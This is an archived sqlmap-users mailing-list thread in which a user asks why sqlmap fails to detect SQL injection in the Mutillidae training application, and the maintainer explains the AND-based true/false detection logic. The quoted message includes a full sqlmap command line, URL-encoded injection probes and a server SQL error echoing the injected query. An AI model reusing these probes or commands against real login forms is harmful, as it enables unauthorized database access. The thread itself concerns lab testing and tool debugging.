Re: [sqlmap-users] "parameter is not dynamic" / "all parameters are not injectable" error
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] "parameter is not dynamic" / "all parameters are not injectable" error
|
From: Miroslav S. <mir...@gm...> - 2010-10-05 15:07:46
|
this was fun to test :)
you've used info: user_name=test&password=1234 while you haven't made
that account in Mutillidae (that link Register on Login page).
problem goes like this. sqlmap tests some sql expression for being
TRUE when testing one of sql injection vectors (like that: "testing
unescaped numeric injection on POST parameter 'password'"), while it
also has a double check vector which is of the same kind but it must
return FALSE.
while sqlmap is AND based, and in your case both checks for all
vectors returned FALSE ("Bad user name or password!"), sqlmap is not
able to properly detect sql injection existence.
this could be a good test case for implementing OR based sql injection
support too, for cases like this one.
kind regards.
On Tue, Oct 5, 2010 at 3:45 PM, ts2112 <ts...@go...> wrote:
> Hi!
>
> I used the publicly available mutillidae test application to test sqlmap.
> Whatever I do I get the response "all parameters are not injectable"
> although this is definitely not the case, as a burp trace shows. Example:
>
> ===== Command:
>
> $ ./sqlmap.py -u "http://was.sntest.sn/mutillidae/index.php?page=login.php"
> --data="user_name=test&password=1234&Submit
> _button=Submit" --method=POST -v 0 --tables --flush-session -p password
> --proxy "http://localhost:15000"
>
> ===== Result 0.9 (similar with 0.8):
>
>>>>>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 15:26:01
>
> [15:26:05] [CRITICAL] all parameters are not injectable
>
> [*] shutting down at: 15:26:05
> <<<<
>
> ===== Among the 38 requests, that burp show, are these 2
>
>>>>>
> 1. Request
> --------------
> POST /mutillidae/index.php?page=login.php HTTP/1.1
> ... <headers>
> user_name=test&password=1234%29%29%29%20AND%20%28%28%283304=3305&Submit_butt
> on=Submit
>
> 1. Response (no SQL-Injection evidence)
> --------------
> HTTP/1.1 200 OK
> Date: Tue, 05 Oct 2010 13:26:04 GMT
> Server: Apache/2.2.12 (Win32) DAV/2 mod_python/3.3.1 Python/2.5.4
> mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_jk/1.2.28
> mod_perl/2.0.4 Perl/v5.10.0
> X-Powered-By: PHP/5.3.0
> Content-Length: 5091
> Connection: close
> Content-Type: text/html
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
> "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
> <html>
> <head>
> <meta content="text/html; charset=us-ascii" http-equiv="content-type">
> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
> </head>
> <body>
> <table border="0" width="100%" cellspacing="0" cellpadding="0">
> <tr><td bgcolor="#88ff88"align="center" colspan="2">
> <table width="100%">
> <td valign="top"><a href="index.php"><img border="0"
> align="top" src="images/coykillericon.png"></a><br>Version 1.3</td>
> <td align="center" valign="top"><h1><b>Mutillidae: Hack,
> Learn, Secure, Have Fun!!!</b></h1>
> <font color="#ff0000">Not logged in</font>
> ...
>
> 2. Request
> ------------------
> POST /mutillidae/index.php?page=login.php HTTP/1.1
> ... <Headers>
> user_name=test&password=1234%27%29%29%29%20AND%20%28%28%28%27xUjr%27=%27xUjr
> &Submit_button=Submit
>
> 2. Response (evidence of SQL-Injection)
> ------------------
> HTTP/1.1 200 OK
> Date: Tue, 05 Oct 2010 13:26:04 GMT
> Server: Apache/2.2.12 (Win32) DAV/2 mod_python/3.3.1 Python/2.5.4
> mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_jk/1.2.28
> mod_perl/2.0.4 Perl/v5.10.0
> X-Powered-By: PHP/5.3.0
> Content-Length: 359
> Connection: close
> Content-Type: text/html
>
> Did you <a href="setupreset.php">setup/reset the DB</a>? <p><b>SQL
> Error:</b>You have an error in your SQL syntax; check the manual that
> corresponds to your MySQL server version for the right syntax to use near
> '))) AND ((('xUjr'='xUjr'' at line 1<p><b>SQL Statement:</b>SELECT * FROM
> accounts WHERE username='test' AND password='1234'))) AND ((('xUjr'='xUjr'
> <<<<
>
> To my understanding, by the difference of those responses and the pattern in
> the second sqlmap should recognize that there *is* an SQL Injection.
>
> Thank you!
>
> Thomas
>
>
>
> ------------------------------------------------------------------------------
> Beautiful is writing same markup. Internet Explorer 9 supports
> standards for HTML5, CSS3, SVG 1.1, ECMAScript5, and DOM L2 & L3.
> Spend less time writing and rewriting code and more time creating great
> experiences on the web. Be a part of the beta today.
> http://p.sf.net/sfu/beautyoftheweb
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
|
